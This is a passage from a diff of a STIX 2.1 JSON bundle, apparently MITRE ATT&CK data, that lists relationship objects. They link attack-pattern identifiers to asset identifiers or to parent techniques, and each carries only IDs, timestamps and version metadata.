"x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80cf98bd-b7dc-45cf-91a6-4ab6b79a7f0b", + "created": "2024-03-25T20:17:49.585Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-25T20:17:49.585Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80e450b6-870d-4fbb-b5ae-3c57d199dc13", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80e7a7d7-86e3-4204-8f16-03d4006b7d9d", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80fb7b9e-b66d-432f-a24d-a6bb1393ba6f", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--81055366-e78b-40e0-a799-4b536ba03db3", + "created": "2023-09-29T18:45:22.474Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:45:22.474Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8110db17-beda-4bf5-a640-fbecf9beb3cf", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8160aa73-3d83-4bc9-8350-91c29e395f45", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--817ae105-3ddf-4766-9d26-ca1ec3c64eb6", + "created": "2023-09-28T20:11:42.579Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:11:42.579Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--81806f43-c9aa-486e-8032-4e4665ba0d39", + "created": "2023-09-29T18:43:13.760Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:43:13.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--818c4c02-d630-4a5c-b7b2-587190179005", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--818ce9d0-8fc2-4a34-a062-f0e6995bdf32", + "created": "2023-09-28T21:13:00.330Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:13:00.330Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--819cad80-acdd-49d5-a3f0-96aad3018eac", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--81a62c36-5301-41e7-afe6-f4417563e9b7", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--81a6a1c2-a834-47ed-ba5e-3048c62115ff", + "created": "2022-03-04T18:30:39.100Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", + "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--81ccd9e7-54a7-4b1c-8c69-7c238cac38f9", + "created": "2020-02-05T19:35:59.214Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--72b5ef57-325c-411b-93ca-a3ca6fa17e31", + "target_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--81dade3f-217d-41b8-8f70-b8695fc1d3f7", + "created": "2020-03-13T19:41:38.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--81dcbbda-c112-4d9d-9eb4-8fc2fe0fc493", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--81f43492-c085-4a4f-baeb-a360497eee67", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8206f6db-dda7-49f3-9c1d-d64889f2e1ac", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8219c770-e5e8-4cba-a203-e8622db49e1f", + "created": "2024-06-27T09:03:56.555Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:03:56.555Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--821d1276-40fc-496c-9da1-3b7b092f9072", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--823818e1-931c-4868-b2b2-ef60e2727fa7", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--823a9785-f026-429e-b709-33b0146ec5a8", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8263d00c-dcd3-4723-b055-912ae3971471", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--826dd102-5a6f-40cd-9054-29051724a05e", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8275c9eb-7fff-4810-a8a4-7a93ec0e5830", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82909cab-8740-41fd-8ee5-09359d2dd571", + "created": "2021-08-18T14:06:45.442Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "target_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8299ba1c-dfe8-41b5-9e4e-b7dcabc99b5b", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82c97e09-809e-4c8b-88bf-3bad873f2b0d", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82d3ae38-6ff3-4596-aa10-3ed3a7d107b9", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82d70dea-4cdd-413c-a127-bc7bc4a8c26c", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82dab5dd-67ab-42ce-82ab-2c467113836c", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82dcf600-69a1-4ea4-aaa4-ab2bb3ece8f0", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82dd9356-7878-4fe5-9baf-f3853b8b2c9f", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82e47c11-6480-4c0b-abd2-48868b9aecd4", + "created": "2023-07-14T14:01:53.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-07-14T14:01:53.802Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--35d30338-5bfa-41b0-a170-ec06dfd75f64", + "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82e5d78c-186b-4d65-821d-4193952d05d3", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82ea5e2c-b5c2-467c-a7ec-bad7a38b743e", + "created": "2022-07-29T19:32:11.660Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-07-29T19:32:11.660Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--82ec02c2-9425-4eca-a01f-38df4f91a20e", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + 